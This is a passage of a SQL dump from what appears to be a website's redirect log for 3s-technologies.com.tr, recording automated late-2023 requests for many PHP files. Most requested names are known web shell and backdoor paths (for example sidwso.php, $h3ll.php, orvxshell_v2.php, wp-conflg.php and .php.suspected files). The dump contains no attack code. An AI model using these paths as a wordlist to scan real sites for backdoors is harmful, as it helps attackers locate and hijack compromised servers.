00:00:00',301),(33626,'http://3s-technologies.com.tr/tr/nzjo5kkwfvty.php',NULL,'http://3s-technologies.com.tr/NZJo5KkwFVTy.php','',1,0,'2023-11-29 10:35:04','0000-00-00 00:00:00',301),(33627,'http://3s-technologies.com.tr/tr/imgg.php',NULL,'http://3s-technologies.com.tr/imgg.php','',1,0,'2023-11-29 10:35:26','0000-00-00 00:00:00',301),(33628,'http://3s-technologies.com.tr/tr/minify.php',NULL,'http://3s-technologies.com.tr/minify.php','',1,0,'2023-11-29 10:40:30','0000-00-00 00:00:00',301),(33629,'http://3s-technologies.com.tr/tr/bsgessfds.php',NULL,'http://3s-technologies.com.tr/bsgessfds.php','',1,0,'2023-11-29 10:44:22','0000-00-00 00:00:00',301),(33630,'http://3s-technologies.com.tr/tr/dm2.php',NULL,'http://3s-technologies.com.tr/dm2.php','',1,0,'2023-11-29 10:51:33','0000-00-00 00:00:00',301),(33631,'http://3s-technologies.com.tr/tr/raw.php',NULL,'http://3s-technologies.com.tr/raw.php','',34,0,'2023-11-29 10:51:40','0000-00-00 00:00:00',301),(33632,'http://3s-technologies.com.tr/tr/wp-mails.php',NULL,'http://3s-technologies.com.tr/wp-mails.php','',9,0,'2023-11-29 11:14:23','0000-00-00 00:00:00',301),(33633,'http://3s-technologies.com.tr/tr/qxonetrmsq.php',NULL,'http://3s-technologies.com.tr/qxonetrmsq.php','',3,0,'2023-11-29 11:18:32','0000-00-00 00:00:00',301),(33634,'http://3s-technologies.com.tr/tr/c.php5',NULL,'http://3s-technologies.com.tr/c.php5','',1,0,'2023-11-29 11:22:54','0000-00-00 00:00:00',301),(33635,'http://3s-technologies.com.tr/tr/phpmailer.lang-sv.php',NULL,'http://3s-technologies.com.tr/phpmailer.lang-sv.php','',1,0,'2023-11-29 11:40:19','0000-00-00 00:00:00',301),(33636,'http://3s-technologies.com.tr/tr/wp-read.php',NULL,'http://3s-technologies.com.tr/wp-read.php','',1,0,'2023-11-29 11:40:25','0000-00-00 00:00:00',301),(33637,'http://3s-technologies.com.tr/tr/tok.php',NULL,'http://3s-technologies.com.tr/tok.php','',1,0,'2023-11-29 11:53:32','0000-00-00 00:00:00',301),(33638,'http://3s-technologies.com.tr/tr/yu.php',NULL,'http://3s-technologies.com.tr/yu.php','',15,0,'2023-11-29 11:56:33','0000-00-00 00:00:00',301),(33639,'http://3s-technologies.com.tr/tr/confiig.php',NULL,'http://3s-technologies.com.tr/confiig.php','',1,0,'2023-11-29 12:05:20','0000-00-00 00:00:00',301),(33640,'http://3s-technologies.com.tr/tr/xz-fx.php',NULL,'http://3s-technologies.com.tr/XZ-FX.php','',1,0,'2023-11-29 12:08:54','0000-00-00 00:00:00',301),(33641,'http://3s-technologies.com.tr/tr/stats.php',NULL,'http://3s-technologies.com.tr/stats.php','',1,0,'2023-11-29 12:12:20','0000-00-00 00:00:00',301),(33642,'http://3s-technologies.com.tr/tr/galler.php',NULL,'http://3s-technologies.com.tr/galler.php','',1,0,'2023-11-29 12:14:22','0000-00-00 00:00:00',301),(33643,'http://3s-technologies.com.tr/tr/xmlrpcs.php.suspected',NULL,'http://3s-technologies.com.tr/xmlrpcs.php.suspected','',1,0,'2023-11-29 12:22:01','0000-00-00 00:00:00',301),(33644,'http://3s-technologies.com.tr/tr/heysrv.php',NULL,'http://3s-technologies.com.tr/heysrv.php','',1,0,'2023-11-29 12:28:44','0000-00-00 00:00:00',301),(33645,'http://3s-technologies.com.tr/tr/wp-hosev.php',NULL,'http://3s-technologies.com.tr/wp-hosev.php','',1,0,'2023-11-29 12:30:02','0000-00-00 00:00:00',301),(33646,'http://3s-technologies.com.tr/tr/local_sniper.php',NULL,'http://3s-technologies.com.tr/local_sniper.php','',1,0,'2023-11-29 12:42:10','0000-00-00 00:00:00',301),(33647,'http://3s-technologies.com.tr/tr/bc9795c864.php',NULL,'http://3s-technologies.com.tr/bc9795c864.php','',2,0,'2023-11-29 12:46:24','0000-00-00 00:00:00',301),(33648,'http://3s-technologies.com.tr/tr/wp-sign.php.suspected',NULL,'http://3s-technologies.com.tr/wp-sign.php.suspected','',2,0,'2023-11-29 12:59:13','0000-00-00 00:00:00',301),(33649,'http://3s-technologies.com.tr/tr/auegeews.php',NULL,'http://3s-technologies.com.tr/auegeews.php','',1,0,'2023-11-29 13:01:50','0000-00-00 00:00:00',301),(33650,'http://3s-technologies.com.tr/tr/wp-penc.php',NULL,'http://3s-technologies.com.tr/wp-penc.php','',1,0,'2023-11-29 13:03:05','0000-00-00 00:00:00',301),(33651,'http://3s-technologies.com.tr/tr/wp-track.php.suspected',NULL,'http://3s-technologies.com.tr/wp-track.php.suspected','',2,0,'2023-11-29 13:18:09','0000-00-00 00:00:00',301),(33652,'http://3s-technologies.com.tr/tr/$h3ll.php',NULL,'http://3s-technologies.com.tr/$h3ll.php','',1,0,'2023-11-29 13:20:14','0000-00-00 00:00:00',301),(33653,'http://3s-technologies.com.tr/tr/lphg.php.suspected',NULL,'http://3s-technologies.com.tr/lphg.php.suspected','',1,0,'2023-11-29 13:30:29','0000-00-00 00:00:00',301),(33654,'http://3s-technologies.com.tr/tr/.mah3r.php',NULL,'http://3s-technologies.com.tr/.mah3r.php','',1,0,'2023-11-29 13:50:23','0000-00-00 00:00:00',301),(33655,'http://3s-technologies.com.tr/tr/wp-cleaner.php',NULL,'http://3s-technologies.com.tr/wp-cleaner.php','',1,0,'2023-11-29 14:03:40','0000-00-00 00:00:00',301),(33656,'http://3s-technologies.com.tr/tr/longer.php',NULL,'http://3s-technologies.com.tr/longer.php','',2,0,'2023-11-29 14:11:23','0000-00-00 00:00:00',301),(33657,'http://3s-technologies.com.tr/tr/wp-flie.php',NULL,'http://3s-technologies.com.tr/wp-flie.php','',1,0,'2023-11-29 14:11:37','0000-00-00 00:00:00',301),(33658,'http://3s-technologies.com.tr/tr/sale.php',NULL,'http://3s-technologies.com.tr/sale.php','',11,0,'2023-11-29 14:22:34','0000-00-00 00:00:00',301),(33659,'http://3s-technologies.com.tr/tr/kdhgfygyfyfs.php',NULL,'http://3s-technologies.com.tr/kdhgfygyfyfs.php','',1,0,'2023-11-29 14:36:20','0000-00-00 00:00:00',301),(33660,'http://3s-technologies.com.tr/tr/wp-session-url.php',NULL,'http://3s-technologies.com.tr/wp-session-url.php','',1,0,'2023-11-29 14:49:49','0000-00-00 00:00:00',301),(33661,'http://3s-technologies.com.tr/tr/baws.php.suspected',NULL,'http://3s-technologies.com.tr/baws.php.suspected','',1,0,'2023-11-29 14:53:42','0000-00-00 00:00:00',301),(33662,'http://3s-technologies.com.tr/tr/tonant.php',NULL,'http://3s-technologies.com.tr/tonant.php','',4,0,'2023-11-29 14:55:10','0000-00-00 00:00:00',301),(33663,'http://3s-technologies.com.tr/tr/rindex.php',NULL,'http://3s-technologies.com.tr/rindex.php','',5,0,'2023-11-29 14:56:25','0000-00-00 00:00:00',301),(33664,'http://3s-technologies.com.tr/tr/wp-logins.php',NULL,'http://3s-technologies.com.tr/wp-logins.php','',3,0,'2023-11-29 14:57:47','0000-00-00 00:00:00',301),(33665,'http://3s-technologies.com.tr/tr/gh.php',NULL,'http://3s-technologies.com.tr/gh.php','',10,0,'2023-11-29 15:01:59','0000-00-00 00:00:00',301),(33666,'http://3s-technologies.com.tr/tr/view.php',NULL,'http://3s-technologies.com.tr/view.php','',20,0,'2023-11-29 15:06:20','0000-00-00 00:00:00',301),(33667,'http://3s-technologies.com.tr/tr/egtsurmybb.php',NULL,'http://3s-technologies.com.tr/egtsurmybb.php','',3,0,'2023-11-29 15:22:41','0000-00-00 00:00:00',301),(33668,'http://3s-technologies.com.tr/tr/sidwso.php',NULL,'http://3s-technologies.com.tr/sidwso.php','',27,0,'2023-11-29 15:30:34','0000-00-00 00:00:00',301),(33669,'http://3s-technologies.com.tr/tr/locations.php',NULL,'http://3s-technologies.com.tr/locations.php','',1,0,'2023-11-29 15:39:09','0000-00-00 00:00:00',301),(33670,'http://3s-technologies.com.tr/tr/qqq.php',NULL,'http://3s-technologies.com.tr/qqq.php','',4,0,'2023-11-29 15:47:48','0000-00-00 00:00:00',301),(33671,'http://3s-technologies.com.tr/tr/main.php',NULL,'http://3s-technologies.com.tr/main.php','',56,0,'2023-11-29 15:55:18','0000-00-00 00:00:00',301),(33672,'http://3s-technologies.com.tr/tr/panel.php',NULL,'http://3s-technologies.com.tr/panel.php','',11,0,'2023-11-29 16:10:14','0000-00-00 00:00:00',301),(33673,'http://3s-technologies.com.tr/tr/pibi7lox.php7',NULL,'http://3s-technologies.com.tr/pibi7lox.php7','',1,0,'2023-11-29 16:11:40','0000-00-00 00:00:00',301),(33674,'http://3s-technologies.com.tr/tr/wp-conflg.php',NULL,'http://3s-technologies.com.tr/wp-conflg.php','',194,0,'2023-11-29 16:11:49','0000-00-00 00:00:00',301),(33675,'http://3s-technologies.com.tr/tr/zzeiajc.php',NULL,'http://3s-technologies.com.tr/zzeiajc.php','',3,0,'2023-11-29 16:29:08','0000-00-00 00:00:00',301),(33676,'http://3s-technologies.com.tr/tr/evnsjg.php',NULL,'http://3s-technologies.com.tr/Evnsjg.php','',1,0,'2023-11-29 16:34:45','0000-00-00 00:00:00',301),(33677,'http://3s-technologies.com.tr/tr/dec.php',NULL,'http://3s-technologies.com.tr/dec.php','',1,0,'2023-11-29 16:58:06','0000-00-00 00:00:00',301),(33678,'http://3s-technologies.com.tr/tr/wp-config.lib.php',NULL,'http://3s-technologies.com.tr/wp-config.lib.php','',3,0,'2023-11-29 16:58:36','0000-00-00 00:00:00',301),(33679,'http://3s-technologies.com.tr/tr/octeesfes.php',NULL,'http://3s-technologies.com.tr/octeesfes.php','',1,0,'2023-11-29 17:30:34','0000-00-00 00:00:00',301),(33680,'http://3s-technologies.com.tr/tr/oybag.php',NULL,'http://3s-technologies.com.tr/oybag.php','',1,0,'2023-11-29 17:30:57','0000-00-00 00:00:00',301),(33681,'http://3s-technologies.com.tr/tr/rjsbgd.php',NULL,'http://3s-technologies.com.tr/Rjsbgd.php','',1,0,'2023-11-29 17:32:10','0000-00-00 00:00:00',301),(33682,'http://3s-technologies.com.tr/tr/wp-system.php.suspected',NULL,'http://3s-technologies.com.tr/wp-system.php.suspected','',1,0,'2023-11-29 17:41:42','0000-00-00 00:00:00',301),(33683,'http://3s-technologies.com.tr/tr/iifbqsyi.php',NULL,'http://3s-technologies.com.tr/iifbqsyi.php','',1,0,'2023-11-29 17:48:02','0000-00-00 00:00:00',301),(33684,'http://3s-technologies.com.tr/tr/wp-comments-post.php',NULL,'http://3s-technologies.com.tr/wp-comments-post.php','',53,0,'2023-11-29 18:02:15','0000-00-00 00:00:00',301),(33685,'http://3s-technologies.com.tr/tr/bpdqdfsvhp.php',NULL,'http://3s-technologies.com.tr/bPdQdfsvhp.php','',1,0,'2023-11-29 18:03:16','0000-00-00 00:00:00',301),(33686,'http://3s-technologies.com.tr/tr/utlxzqzoxh.php',NULL,'http://3s-technologies.com.tr/utLxZqZoXh.php','',1,0,'2023-11-29 18:04:56','0000-00-00 00:00:00',301),(33687,'http://3s-technologies.com.tr/tr/indeh.php',NULL,'http://3s-technologies.com.tr/indeh.php','',4,0,'2023-11-29 18:16:34','0000-00-00 00:00:00',301),(33688,'http://3s-technologies.com.tr/tr/zhrmqsqx1.php',NULL,'http://3s-technologies.com.tr/zhrmqsqx1.php','',1,0,'2023-11-29 18:18:16','0000-00-00 00:00:00',301),(33689,'http://3s-technologies.com.tr/tr/sa.php',NULL,'http://3s-technologies.com.tr/sa.php','',8,0,'2023-11-29 18:19:19','0000-00-00 00:00:00',301),(33690,'http://3s-technologies.com.tr/tr/bmszd.php',NULL,'http://3s-technologies.com.tr/bmszd.php','',1,0,'2023-11-29 18:21:04','0000-00-00 00:00:00',301),(33691,'http://3s-technologies.com.tr/tr/redpaus.php',NULL,'http://3s-technologies.com.tr/redpaus.php','',1,0,'2023-11-29 18:36:43','0000-00-00 00:00:00',301),(33692,'http://3s-technologies.com.tr/tr/module.php',NULL,'http://3s-technologies.com.tr/module.php','',4,0,'2023-11-29 18:36:53','0000-00-00 00:00:00',301),(33693,'http://3s-technologies.com.tr/tr/ghreeq.php',NULL,'http://3s-technologies.com.tr/ghreeq.php','',2,0,'2023-11-29 19:04:47','0000-00-00 00:00:00',301),(33694,'http://3s-technologies.com.tr/tr/wp-portin.php.suspected',NULL,'http://3s-technologies.com.tr/wp-portin.php.suspected','',2,0,'2023-11-29 19:08:00','0000-00-00 00:00:00',301),(33695,'http://3s-technologies.com.tr/tr/wp-cleaner.php.suspected',NULL,'http://3s-technologies.com.tr/wp-cleaner.php.suspected','',2,0,'2023-11-29 19:08:54','0000-00-00 00:00:00',301),(33696,'http://3s-technologies.com.tr/tr/maillist.php',NULL,'http://3s-technologies.com.tr/maillist.php','',1,0,'2023-11-29 19:23:55','0000-00-00 00:00:00',301),(33697,'http://3s-technologies.com.tr/tr/webhook.php',NULL,'http://3s-technologies.com.tr/webhook.php','',2,0,'2023-11-29 19:37:14','0000-00-00 00:00:00',301),(33698,'http://3s-technologies.com.tr/tr/eval.php',NULL,'http://3s-technologies.com.tr/eval.php','',3,0,'2023-11-29 19:41:33','0000-00-00 00:00:00',301),(33699,'http://3s-technologies.com.tr/tr/sitemaps.php',NULL,'http://3s-technologies.com.tr/sitemaps.php','',9,0,'2023-11-29 20:12:27','0000-00-00 00:00:00',301),(33700,'http://3s-technologies.com.tr/tr/wp-options.php',NULL,'http://3s-technologies.com.tr/wp-options.php','',1,0,'2023-11-29 20:12:40','0000-00-00 00:00:00',301),(33701,'http://3s-technologies.com.tr/tr/xm1rpe.php.suspected',NULL,'http://3s-technologies.com.tr/xm1rpe.php.suspected','',1,0,'2023-11-29 20:15:44','0000-00-00 00:00:00',301),(33702,'http://3s-technologies.com.tr/tr/site.php',NULL,'http://3s-technologies.com.tr/site.php','',1,0,'2023-11-29 20:24:22','0000-00-00 00:00:00',301),(33703,'http://3s-technologies.com.tr/tr/htcache.php',NULL,'http://3s-technologies.com.tr/htcache.php','',1,0,'2023-11-29 20:48:01','0000-00-00 00:00:00',301),(33704,'http://3s-technologies.com.tr/tr/flame.php',NULL,'http://3s-technologies.com.tr/flame.php','',7,0,'2023-11-29 20:58:13','0000-00-00 00:00:00',301),(33705,'http://3s-technologies.com.tr/tr/kylbknqe.php',NULL,'http://3s-technologies.com.tr/kylbknqe.php','',1,0,'2023-11-29 21:14:30','0000-00-00 00:00:00',301),(33706,'http://3s-technologies.com.tr/tr/fresh1.php',NULL,'http://3s-technologies.com.tr/fresh1.php','',1,0,'2023-11-29 21:18:31','0000-00-00 00:00:00',301),(33707,'http://3s-technologies.com.tr/tr/cxper.php',NULL,'http://3s-technologies.com.tr/cxper.php','',1,0,'2023-11-29 21:20:04','0000-00-00 00:00:00',301),(33708,'http://3s-technologies.com.tr/tr/tyui.php',NULL,'http://3s-technologies.com.tr/tyui.php','',1,0,'2023-11-29 21:21:05','0000-00-00 00:00:00',301),(33709,'http://3s-technologies.com.tr/tr/ar.php',NULL,'http://3s-technologies.com.tr/ar.php','',146,0,'2023-11-29 21:22:00','0000-00-00 00:00:00',301),(33710,'http://3s-technologies.com.tr/tr/html.php',NULL,'http://3s-technologies.com.tr/html.php','',43,0,'2023-11-29 21:35:12','0000-00-00 00:00:00',301),(33711,'http://3s-technologies.com.tr/tr/add-note.php',NULL,'http://3s-technologies.com.tr/add-note.php','',1,0,'2023-11-29 22:23:02','0000-00-00 00:00:00',301),(33712,'http://3s-technologies.com.tr/tr/asw.php',NULL,'http://3s-technologies.com.tr/asw.php','',12,0,'2023-11-30 11:32:26','0000-00-00 00:00:00',301),(33713,'http://3s-technologies.com.tr/tr/wp-guide.php.suspected',NULL,'http://3s-technologies.com.tr/wp-guide.php.suspected','',1,0,'2023-11-30 11:34:21','0000-00-00 00:00:00',301),(33714,'http://3s-technologies.com.tr/tr/orvxshell_v2.php',NULL,'http://3s-technologies.com.tr/orvxshell_v2.php','',3,0,'2023-11-30 12:24:09','0000-00-00 00:00:00',301),(33715,'http://3s-technologies.com.tr/tr/ffsaa.php',NULL,'http://3s-technologies.com.tr/ffSaA.php','',1,0,'2023-11-30 12:26:05','0000-00-00 00:00:00',301),(33716,'http://3s-technologies.com.tr/tr/andmy.php',NULL,'http://3s-technologies.com.tr/andmy.php','',1,0,'2023-11-30 12:56:57','0000-00-00 00:00:00',301),(33717,'http://3s-technologies.com.tr/tr/vtnasf.php',NULL,'http://3s-technologies.com.tr/vtnasf.php','',1,0,'2023-11-30 12:59:28','0000-00-00 00:00:00',301),(33718,'http://3s-technologies.com.tr/tr/wp-links.php',NULL,'http://3s-technologies.com.tr/wp-links.php','',124,0,'2023-11-30 12:59:40','0000-00-00 00:00:00',301),(33719,'http://3s-technologies.com.tr/tr/wp-inc.php|root',NULL,'http://3s-technologies.com.tr/wp-inc.php|root','',1,0,'2023-11-30 13:38:35','0000-00-00 00:00:00',301),(33720,'http://3s-technologies.com.tr/tr/hapygeslyegss.php',NULL,'http://3s-technologies.com.tr/hapygeslyegss.php','',1,0,'2023-11-30 14:17:59','0000-00-00 00:00:00',301),(33721,'http://3s-technologies.com.tr/tr/huvokjtgzb.php',NULL,'http://3s-technologies.com.tr/huvOkjTgzb.php','',1,0,'2023-11-30 14:18:25','0000-00-00 00:00:00',301),(33722,'http://3s-technologies.com.tr/tr/wp-singups.php',NULL,'http://3s-technologies.com.tr/wp-singups.php','',2,0,'2023-11-30 14:37:06','0000-00-00 00:00:00',301),(33723,'http://3s-technologies.com.tr/tr/hrejl3.php',NULL,'http://3s-technologies.com.tr/hrejl3.php','',1,0,'2023-11-30 14:44:52','0000-00-00 00:00:00',301),(33724,'http://3s-technologies.com.tr/tr/opz-opx.php',NULL,'http://3s-technologies.com.tr/OPZ-OPX.php','',1,0,'2023-11-30 14:52:38','0000-00-00 00:00:00',301),(33725,'http://3s-technologies.com.tr/tr/ran.php',NULL,'http://3s-technologies.com.tr/ran.php','',4,0,'2023-11-30 14:52:39','0000-00-00 00:00:00',301),(33726,'http://3s-technologies.com.tr/tr/marjun2.php',NULL,'http://3s-technologies.com.tr/marjun2.php','',1,0,'2023-11-30 14:57:16','0000-00-00 00:00:00',301),(33727,'http://3s-technologies.com.tr/tr/greenpxok.php',NULL,'http://3s-technologies.com.tr/GreenPxOK.php','',1,0,'2023-11-30 15:11:35','0000-00-00 00:00:00',301),(33728,'http://3s-technologies.com.tr/tr/red.php',NULL,'http://3s-technologies.com.tr/red.php','',7,0,'2023-11-30 15:20:06','0000-00-00 00:00:00',301),(33729,'http://3s-technologies.com.tr/tr/hrtp.php.suspected',NULL,'http://3s-technologies.com.tr/hrtp.php.suspected','',1,0,'2023-11-30 15:24:14','0000-00-00 00:00:00',301),(33730,'http://3s-technologies.com.tr/tr/wp-activates.php',NULL,'http://3s-technologies.com.tr/wp-activates.php','',1,0,'2023-11-30 15:31:59','0000-00-00 00:00:00',301),(33731,'http://3s-technologies.com.tr/tr/xnewdayxtool.php',NULL,'http://3s-technologies.com.tr/xnewdayxtool.php','',1,0,'2023-11-30 15:42:15','0000-00-00 00:00:00',301),(33732,'http://3s-technologies.com.tr/tr/jjdid.php',NULL,'http://3s-technologies.com.tr/jjdid.php','',1,0,'2023-11-30 15:42:25','0000-00-00 00:00:00',301),(33733,'http://3s-technologies.com.tr/tr/wp-info.php.suspected',NULL,'http://3s-technologies.com.tr/wp-info.php.suspected','',1,0,'2023-11-30 16:05:28','0000-00-00 00:00:00',301),(33734,'http://3s-technologies.com.tr/tr/wp-config-info.php',NULL,'http://3s-technologies.com.tr/wp-config-info.php','',1,0,'2023-11-30 16:07:37','0000-00-00 00:00:00',301),(33735,'http://3s-technologies.com.tr/tr/qnnazeshyh.php',NULL,'http://3s-technologies.com.tr/qnnaZEShyh.php','',1,0,'2023-11-30 16:25:17','0000-00-00 00:00:00',301),(33736,'http://3s-technologies.com.tr/tr/wp-cache.php',NULL,'http://3s-technologies.com.tr/wp-cache.php','',33,0,'2023-11-30 16:43:18','0000-00-00 00:00:00',301),(33737,'http://3s-technologies.com.tr/tr/wp-sign.php',NULL,'http://3s-technologies.com.tr/wp-sign.php','',7,0,'2023-11-30 17:34:08','0000-00-00 00:00:00',301),(33738,'http://3s-technologies.com.tr/tr/shadowx.php',NULL,'http://3s-technologies.com.tr/shadowx.php','',1,0,'2023-11-30 17:38:15','0000-00-00 00:00:00',301),(33739,'http://3s-technologies.com.tr/tr/class.php',NULL,'http://3s-technologies.com.tr/class.php','',282,0,'2023-11-30 17:38:21','0000-00-00 00:00:00',301),(33740,'http://3s-technologies.com.tr/tr/theme_support.php',NULL,'http://3s-technologies.com.tr/theme_support.php','',2,0,'2023-11-30 17:59:07','0000-00-00 00:00:00',301),(33741,'http://3s-technologies.com.tr/tr/fx2.php',NULL,'http://3s-technologies.com.tr/fx2.php','',1,0,'2023-11-30 18:12:30','0000-00-00 00:00:00',301),(33742,'http://3s-technologies.com.tr/tr/wp-dashboard.php',NULL,'http://3s-technologies.com.tr/wp-dashboard.php','',1,0,'2023-11-30 18:12:33','0000-00-00 00:00:00',301),(33743,'http://3s-technologies.com.tr/tr/o22opo.php',NULL,'http://3s-technologies.com.tr/o22opo.php','',2,0,'2023-11-30 18:14:11','0000-00-00 00:00:00',301),(33744,'http://3s-technologies.com.tr/tr/wp-indo.php',NULL,'http://3s-technologies.com.tr/wp-indo.php','',1,0,'2023-11-30 18:17:09','0000-00-00 00:00:00',301),(33745,'http://3s-technologies.com.tr/tr/wp-apps.php',NULL,'http://3s-technologies.com.tr/wp-apps.php','',2,0,'2023-11-30 18:32:08','0000-00-00 00:00:00',301),(33746,'http://3s-technologies.com.tr/tr/ox.php',NULL,'http://3s-technologies.com.tr/ox.php','',5,0,'2023-11-30 18:32:57','0000-00-00 00:00:00',301),(33747,'http://3s-technologies.com.tr/tr/hzjtpr.php',NULL,'http://3s-technologies.com.tr/hzjtpr.php','',1,0,'2023-11-30 19:06:54','0000-00-00 00:00:00',301),(33748,'http://3s-technologies.com.tr/tr/glay.php',NULL,'http://3s-technologies.com.tr/glay.php','',1,0,'2023-11-30 19:11:02','0000-00-00 00:00:00',301),(33749,'http://3s-technologies.com.tr/tr/lcajq.php',NULL,'http://3s-technologies.com.tr/lcajq.php','',1,0,'2023-11-30 19:26:24','0000-00-00 00:00:00',301),(33750,'http://3s-technologies.com.tr/tr/sebysr.php',NULL,'http://3s-technologies.com.tr/sebysr.php','',1,0,'2023-11-30 19:29:02','0000-00-00 00:00:00',301),(33751,'http://3s-technologies.com.tr/tr/wp-map.php',NULL,'http://3s-technologies.com.tr/wp-map.php','',1,0,'2023-11-30 19:42:57','0000-00-00 00:00:00',301),(33752,'http://3s-technologies.com.tr/tr/sz.php',NULL,'http://3s-technologies.com.tr/sz.php','',1,0,'2023-11-30 19:44:13','0000-00-00 00:00:00',301),(33753,'http://3s-technologies.com.tr/tr/wp-gelo.php',NULL,'http://3s-technologies.com.tr/wp-gelo.php','',2,0,'2023-11-30 20:02:31','0000-00-00 00:00:00',301),(33754,'http://3s-technologies.com.tr/tr/bb-config.php',NULL,'http://3s-technologies.com.tr/bb-config.php','',1,0,'2023-11-30 20:10:56','0000-00-00 00:00:00',301),(33755,'http://3s-technologies.com.tr/tr/wp-setting.php',NULL,'http://3s-technologies.com.tr/wp-setting.php','',25,0,'2023-11-30 20:24:05','0000-00-00 00:00:00',301),(33756,'http://3s-technologies.com.tr/tr/0ran.php',NULL,'http://3s-technologies.com.tr/0ran.php','',1,0,'2023-11-30 20:26:35','0000-00-00 00:00:00',301),(33757,'http://3s-technologies.com.tr/tr/system_log.php',NULL,'http://3s-technologies.com.tr/system_log.php','',228,0,'2023-11-30 20:30:29','0000-00-00 00:00:00',301),(33758,'http://3s-technologies.com.tr/tr/shonashell.php',NULL,'http://3s-technologies.com.tr/shonashell.php','',1,0,'2023-11-30 20:37:56','0000-00-00 00:00:00',301),(33759,'http://3s-technologies.com.tr/tr/esjfglis.php',NULL,'http://3s-technologies.com.tr/Esjfglis.php','',2,0,'2023-11-30 20:38:30','0000-00-00 00:00:00',301),(33760,'http://3s-technologies.com.tr/tr/berandal.php',NULL,'http://3s-technologies.com.tr/berandal.php','',1,0,'2023-11-30 20:59:24','0000-00-00 00:00:00',301),(33761,'http://3s-technologies.com.tr/tr/stiute.php',NULL,'http://3s-technologies.com.tr/stiute.php','',1,0,'2023-11-30 21:33:37','0000-00-00 00:00:00',301),(33762,'http://3s-technologies.com.tr/tr/wp-ajax.php',NULL,'http://3s-technologies.com.tr/wp-ajax.php','',1,0,'2023-11-30 21:33:57','0000-00-00 00:00:00',301),(33763,'http://3s-technologies.com.tr/tr/langar.php',NULL,'http://3s-technologies.com.tr/langar.php','',1,0,'2023-11-30 21:36:01','0000-00-00 00:00:00',301),(33764,'http://3s-technologies.com.tr/tr/feed-goal.php',NULL,'http://3s-technologies.com.tr/feed-goal.php','',1,0,'2023-11-30 21:58:19','0000-00-00 00:00:00',301),(33765,'http://3s-technologies.com.tr/tr/qsa4xv.php',NULL,'http://3s-technologies.com.tr/qsa4xv.php','',1,0,'2023-11-30 22:21:30','0000-00-00 00:00:00',301),(33766,'http://3s-technologies.com.tr/tr/aojor.php.suspected',NULL,'http://3s-technologies.com.tr/aojor.php.suspected','',2,0,'2023-11-30 22:23:34','0000-00-00 00:00:00',301),(33767,'http://3s-technologies.com.tr/tr/tesa.php',NULL,'http://3s-technologies.com.tr/tesa.php','',1,0,'2023-11-30 22:54:24','0000-00-00 00:00:00',301),(33768,'http://3s-technologies.com.tr/tr/ylpatbqcbs.php',NULL,'http://3s-technologies.com.tr/yLPaTBQCBS.php','',1,0,'2023-11-30 22:57:29','0000-00-00 00:00:00',301),(33769,'http://3s-technologies.com.tr/tr/n46dgry5.php',NULL,'http://3s-technologies.com.tr/n46dgry5.php','',1,0,'2023-11-30 22:57:31','0000-00-00 00:00:00',301),(33770,'http://3s-technologies.com.tr/tr/sckytgjj.php',NULL,'http://3s-technologies.com.tr/sckytgjj.php','',1,0,'2023-11-30 23:11:23','0000-00-00 00:00:00',301),(33771,'http://3s-technologies.com.tr/tr/wp-mini.php',NULL,'http://3s-technologies.com.tr/wp-mini.php','',2,0,'2023-11-30 23:16:30','0000-00-00 00:00:00',301),(33772,'http://3s-technologies.com.tr/tr/simple.php.suspected',NULL,'http://3s-technologies.com.tr/simple.php.suspected','',1,0,'2023-11-30 23:51:54','0000-00-00 00:00:00',301),(33773,'http://3s-technologies.com.tr/tr/ajopr.php',NULL,'http://3s-technologies.com.tr/ajopr.php','',2,0,'2023-11-30 23:55:59','0000-00-00 00:00:00',301),(33774,'http://3s-technologies.com.tr/tr/wp-update.php.suspected',NULL,'http://3s-technologies.com.tr/wp-update.php.suspected','',1,0,'2023-12-01 00:09:39','0000-00-00 00:00:00',301),(33775,'http://3s-technologies.com.tr/tr/aya.php',NULL,'http://3s-technologies.com.tr/aya.php','',1,0,'2023-12-01 00:15:47','0000-00-00 00:00:00',301),(33776,'http://3s-technologies.com.tr/tr/ziyafo.php',NULL,'http://3s-technologies.com.tr/ziyafo.php','',1,0,'2023-12-01 00:15:56','0000-00-00 00:00:00',301),(33777,'http://3s-technologies.com.tr/tr/reskyber.php',NULL,'http://3s-technologies.com.tr/reskyber.php','',1,0,'2023-12-01 00:34:41','0000-00-00 00:00:00',301),(33778,'http://3s-technologies.com.tr/tr/siteindex.php.suspected',NULL,'http://3s-technologies.com.tr/siteindex.php.suspected','',2,0,'2023-12-01 00:51:33','0000-00-00 00:00:00',301),(33779,'http://3s-technologies.com.tr/tr/inbex.php',NULL,'http://3s-technologies.com.tr/inbex.php','',1,0,'2023-12-01 01:09:21','0000-00-00 00:00:00',301),(33780,'http://3s-technologies.com.tr/tr/css_.php.suspected',NULL,'http://3s-technologies.com.tr/css_.php.suspected','',1,0,'2023-12-01 01:09:50','0000-00-00 00:00:00',301),(33781,'http://3s-technologies.com.tr/tr/yo.php',NULL,'http://3s-technologies.com.tr/yo.php','',1,0,'2023-12-01 01:10:09','0000-00-00 00:00:00',301),(33782,'http://3s-technologies.com.tr/tr/ix.php.php',NULL,'http://3s-technologies.com.tr/ix.php.PhP','',1,0,'2023-12-01 01:23:07','0000-00-00 00:00:00',301),(33783,'http://3s-technologies.com.tr/tr/uiop.php',NULL,'http://3s-technologies.com.tr/uiop.php','',1,0,'2023-12-01 01:27:53','0000-00-00 00:00:00',301),(33784,'http://3s-technologies.com.tr/tr/wsa.php.suspected',NULL,'http://3s-technologies.com.tr/wsa.php.suspected','',1,0,'2023-12-01 01:27:53','0000-00-00 00:00:00',301),(33785,'http://3s-technologies.com.tr/tr/smgpcagtta.php',NULL,'http://3s-technologies.com.tr/sMGpcAGTTa.php','',1,0,'2023-12-01 02:04:19','0000-00-00 00:00:00',301),(33786,'http://3s-technologies.com.tr/tr/wp-muen.php',NULL,'http://3s-technologies.com.tr/wp-muen.php','',3,0,'2023-12-01 02:15:55','0000-00-00 00:00:00',301),(33787,'http://3s-technologies.com.tr/tr/wp-blog-content.php',NULL,'http://3s-technologies.com.tr/wp-blog-content.php','',1,0,'2023-12-01 02:20:03','0000-00-00 00:00:00',301),(33788,'http://3s-technologies.com.tr/tr/y6badg7n9la.php',NULL,'http://3s-technologies.com.tr/Y6BADg7n9La.php','',1,0,'2023-12-01 02:32:23','0000-00-00 00:00:00',301),(33789,'http://3s-technologies.com.tr/tr/cindex.php',NULL,'http://3s-technologies.com.tr/cindex.php','',1,0,'2023-12-01 02:37:13','0000-00-00 00:00:00',301),(33790,'http://3s-technologies.com.tr/tr/security.php',NULL,'http://3s-technologies.com.tr/security.php','',50,0,'2023-12-01 02:50:14','0000-00-00 